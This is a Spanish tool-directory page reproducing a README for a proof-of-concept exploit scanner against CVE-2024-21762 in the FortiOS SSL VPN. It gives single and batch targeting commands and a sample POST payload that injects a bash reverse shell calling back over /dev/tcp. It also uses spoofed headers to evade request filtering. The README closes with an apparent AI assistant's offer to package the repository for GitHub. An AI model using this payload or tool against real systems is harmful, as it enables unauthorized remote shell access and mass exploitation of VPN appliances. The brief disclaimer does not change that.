Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-21762_FortiNet_PoC — Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate del SSL VPN de FortiOS con entrega de payload de shell inversa. | Kitploit
Herramientas/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate del SSL VPN de FortiOS con entrega de payload de shell inversa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
21hace 1 añoAún no revisado

CVE-2024-21762_FortiNet_PoC

Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate de SSL VPN de FortiOS con entrega de payload de shell inversa.

Aquí tienes una redacción estilo GitHub para tu proyecto, que incluye un resumen limpio y conciso, una guía de uso y contexto sobre cómo encaja con el CVE.


🔥 Título del Proyecto: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Resumen (para la línea de descripción de GitHub):

Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate de SSL VPN de FortiOS con entrega de payload de shell inversa.


📜 Descripción General

Este script de Python es una herramienta PoC (Prueba de Concepto) diseñada para interactuar con la interfaz SSL VPN de FortiOS de Fortinet, dirigida a CVE-2024-21762 — una vulnerabilidad de desbordamiento de búfer basado en pila o inyección de comandos en el endpoint /remote/hostcheck_validate.

Descargo de responsabilidad: Esto es solo para fines educativos y de pruebas autorizadas.


🧬 Cómo Funciona

  • Envía una solicitud POST manipulada a /remote/hostcheck_validate en una interfaz SSL VPN de FortiGate.
  • Inyecta un payload de shell inversa bash en un parámetro vulnerable simulado (host).
  • Utiliza cabeceras falsificadas (User-Agent, Cookie) para evadir el filtrado superficial de solicitudes de FortiOS.
  • Recibe y registra las respuestas del servidor para evaluar el éxito de la explotación.
  • Admite pruebas de objetivos individuales o por lotes con automatización de archivos de entrada/salida y barras de progreso.

🛠️ Características

  • 🧪 Inyección de payload de shell inversa mediante campo de formulario controlado
  • 🧾 Captura completa de la respuesta HTTP para análisis (last_response.txt)
  • 📊 Barra de progreso para seguimiento en modo individual/lote
  • 🗃️ Modo lote con soporte de archivos de entrada/salida
  • 🔄 Modular y ampliable

⚙️ Requisitos

  • Python 3.6+
  • tqdm para visualización del progreso

Instala las dependencias:

root@kitploit:~
pip install tqdm

🚀 Uso

Modo de Objetivo Único

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

Modo Lote

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: Lista de objetivos en formato IP:PORT, uno por línea
  • results.txt: Registro de salida de los intentos de explotación

📥 Ejemplo de Payload Enviado

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Registros

La herramienta escribe la respuesta HTTP completa de cada intento en:

root@kitploit:~
last_response.txt

Úsalo para verificar si la solicitud fue procesada, rechazada, o si se devolvió un código de error.


⚠️ Legal

Este código se proporciona solo con fines educativos y de pruebas autorizadas. No lo utilices en redes o sistemas que no poseas o para los que no tengas permiso explícito de prueba.


✍️ Autor

Carter — Ingeniero de Ciberseguridad, entusiasta de Red/Purple Team, fanático de la automatización de PoC.


¿Te gustaría que esto se empaquetara en un archivo README.md + estructura de repositorio lista para subir a GitHub? Puedo generarlo a continuación.

Descargar herramienta